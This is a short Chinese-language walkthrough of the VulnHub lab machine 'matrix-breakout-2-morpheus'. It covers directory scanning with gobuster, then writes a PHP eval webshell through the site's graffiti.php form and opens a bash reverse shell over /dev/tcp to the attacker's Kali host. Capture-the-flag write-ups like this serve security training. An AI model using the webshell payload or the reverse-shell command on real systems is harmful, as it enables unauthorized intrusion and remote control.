VulnHub-matrix-breakout-2-morpheus通关攻略

        一、信息收集

        第一步：确定靶机IP为192.168.0.106

        第二步：扫描后台及开放端口

        第三步：进行敏感目录及文件扫描

#敏感目录及文件
DIRECTORY: http://192.168.0.106/javascript/ 
DIRECTORY: http://192.168.0.106/javascript/jquery/ 

http://192.168.0.106/index.html (CODE:200|SIZE:348)                           
http://192.168.0.106/robots.txt (CODE:200|SIZE:47)                            
http://192.168.0.106/server-status (CODE:403|SIZE:278)  
http://192.168.0.106/javascript/jquery/jquery (CODE:200|SIZE:287600)        

        第四步：访问敏感文件与端口，寻找有用信息

        第五步：使用gobuster进一步扫描

#使用gobuster
gobuster dir -u http://192.168.0.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

/graffiti.txt         (Status: 200) [Size: 139]
/graffiti.php         (Status: 200) [Size: 451]

        二、网站爆破

        第一步：访问http://192.168.0.106//graffiti.php并进行留言，发现会在graffiti.txt显示

        第二步：bp抓包，重新留言，尝试写入一句话木马

message=<?php eval(@$_POST[cmd]);?>&file=shell.php

        第三步：使用蚁剑连接，在根目录下找到flag

        第四步：反弹shell，在先Kali开启监听，再在蚁剑右键打开终端输入命令回车

#蚁剑 --- 此处为Kali的IP，反弹至6666端口
/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/6666 0>&1'

                                                                                                                        FROM  IYU_